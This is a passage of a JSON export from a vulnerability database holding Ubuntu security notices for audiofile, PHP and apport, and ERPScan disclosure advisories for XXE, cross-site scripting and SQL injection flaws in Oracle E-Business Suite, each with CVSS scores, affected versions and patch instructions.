GMT\n", "modified": "2017-04-09T11:09:00", "published": "2016-12-12T06:17:00", "href": "https://www.openbugbounty.org/reports/197623/", "id": "OBB:197623", "type": "openbugbounty", "title": "kibergrad.fm XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "description": "Quarterly update closes 140 vulnerabilities in different applications.", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "description": "PHAR extension DoS.", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private 